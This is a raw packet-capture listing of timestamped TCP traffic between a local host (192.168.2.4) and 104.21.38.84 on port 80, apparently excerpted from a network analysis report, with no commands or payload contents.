                                                                                          Jan 4, 2025 11:08:07.332087994 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.332097054 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.332107067 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.449301004 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.482685089 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.558366060 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.624203920 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.624248981 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.757905006 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.757958889 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.758610010 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.762833118 CET8049816104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.762890100 CET4981680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.763096094 CET8049818104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.763135910 CET4981880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.763377905 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:07.763437033 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.763535023 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:07.769284010 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.107796907 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.112680912 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.112692118 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.112715006 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.207844019 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.279691935 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.477519989 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.592092991 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.636811018 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.637008905 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.641849041 CET8049825104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.641865015 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.641926050 CET4982580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.641962051 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.642086983 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:08.646852970 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:08.998424053 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.003623962 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.003662109 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.003674030 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.102413893 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.295203924 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.373985052 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.482712984 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.499808073 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.500471115 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.504852057 CET8049831104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.504908085 CET4983180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.505291939 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.505685091 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.505786896 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.510586977 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.857773066 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:09.862605095 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.862617016 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.862626076 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:09.965820074 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.092093945 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.229866982 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.295218945 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.364682913 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.365012884 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.369672060 CET8049836104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.369765043 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.369824886 CET4983680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.369889975 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.369998932 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.374756098 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.717325926 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:10.722198963 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.722208977 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.722218037 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.813812017 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:10.935899973 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.093246937 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.154560089 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.321598053 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.322267056 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.326709986 CET8049841104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.326756954 CET4984180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.327106953 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.327162981 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.327378035 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.332169056 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.686954975 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:11.691998005 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.692009926 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.692013979 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.781033039 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:11.935966015 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.048676968 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.131195068 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.501687050 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.502530098 CET4985380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.506843090 CET8049849104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.506896973 CET4984980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.507328987 CET8049853104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.507390022 CET4985380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.507492065 CET4985380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.512264967 CET8049853104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.562378883 CET4985480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.564630032 CET4985380192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.567177057 CET8049854104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.567234993 CET4985480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.567403078 CET4985480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.572200060 CET8049854104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.613744974 CET8049853104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.701047897 CET4986080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.705884933 CET8049860104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:12.705935955 CET4986080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.706046104 CET4986080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:12.710805893 CET8049860104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.005017042 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.005054951 CET4994080192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.005091906 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.005187035 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.010005951 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.138636112 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.143516064 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.143573046 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.143675089 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.148466110 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.357947111 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.362860918 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.363042116 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.458884954 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.498708963 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.503607988 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.503618956 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.503628016 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.596453905 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.639045954 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.716880083 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.779700041 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.779762030 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.826534986 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.914035082 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.914166927 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.915285110 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.919030905 CET8049942104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.919099092 CET4994280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.919460058 CET8049946104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.919509888 CET4994680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.920156956 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:24.920223951 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.920330048 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:24.925117970 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.279809952 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.284759998 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.284796000 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.284831047 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.382719994 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.482799053 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.649338007 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.779675961 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.789679050 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.794764996 CET8049952104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.797432899 CET4995280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.856509924 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.861341953 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:25.865545988 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.865648985 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:25.870475054 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.219058037 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.224041939 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.224056959 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.224069118 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.317733049 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.357799053 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.496916056 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.545284986 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.652085066 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.653179884 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.657219887 CET8049959104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.657274008 CET4995980192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.658004045 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:26.658077955 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.658226013 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:26.663028002 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.014198065 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.019093990 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.019109964 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.019160032 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.131364107 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.185920954 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.388319969 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.482912064 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.552146912 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.556735992 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.557179928 CET8049965104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.557229996 CET4996580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.561585903 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.561654091 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.563034058 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.567843914 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.920432091 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:27.925282001 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.925292969 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:27.925339937 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.006607056 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.060926914 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.276791096 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.326559067 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.460275888 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.460889101 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.465370893 CET8049971104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.465830088 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.465903997 CET4997180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.465938091 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.466058016 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.470879078 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.811028004 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:28.815924883 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.815936089 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.815943003 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.918373108 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:28.982820034 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.187083006 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.389069080 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.437237024 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.437956095 CET4997880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.442322016 CET8049977104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.442374945 CET4997780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.442769051 CET8049978104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.442842960 CET4997880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.442920923 CET4997880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.447668076 CET8049978104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.733828068 CET4997880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.733887911 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.738779068 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.738833904 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.738935947 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.743688107 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.782758951 CET8049978104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.801593065 CET8049978104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:29.801647902 CET4997880192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:29.856414080 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.061132908 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.061212063 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.061341047 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.066153049 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.092278957 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.097160101 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.097261906 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.202022076 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.295315027 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.420392036 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.425287008 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.425298929 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.425317049 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.462202072 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.504677057 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.560942888 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.592194080 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.763855934 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.810969114 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.885642052 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.885709047 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.886277914 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.890638113 CET8049984104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.890697956 CET4998480192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.890940905 CET8049985104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.891061068 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:30.891107082 CET4998580192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.891132116 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.891230106 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:30.896003008 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.248611927 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:31.253515959 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.253530979 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.253565073 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.359905958 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.404691935 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:31.631006956 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:31.686666965 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.038827896 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.039625883 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.043790102 CET8049991104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.044406891 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.044461012 CET4999180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.044492006 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.045197010 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.050875902 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.389277935 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.394088984 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.394109011 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.394119024 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.497493029 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.592205048 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.760770082 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:32.887815952 CET4999780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.888434887 CET5000280192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:32.892940998 CET8049997104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:43.699043989 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:43.699157000 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:43.703864098 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.045504093 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.050321102 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.050342083 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.050386906 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.142327070 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.295402050 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.398593903 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.531459093 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.532102108 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.536533117 CET8050081104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.536587954 CET5008180192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.536890984 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.536955118 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.537066936 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.541800022 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.889316082 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:44.894208908 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.894221067 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.894227982 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:44.999789000 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:45.217283964 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.217947006 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:45.218008995 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.259191036 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:45.393410921 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.394005060 CET5008780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.398536921 CET8050086104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:45.398802042 CET8050087104.21.38.84192.168.2.4
                                                                                          Jan 4, 2025 11:08:45.398855925 CET5008680192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.398885012 CET5008780192.168.2.4104.21.38.84
                                                                                          Jan 4, 2025 11:08:45.398993015 CET5008780192.168.2.4104.21.38.84
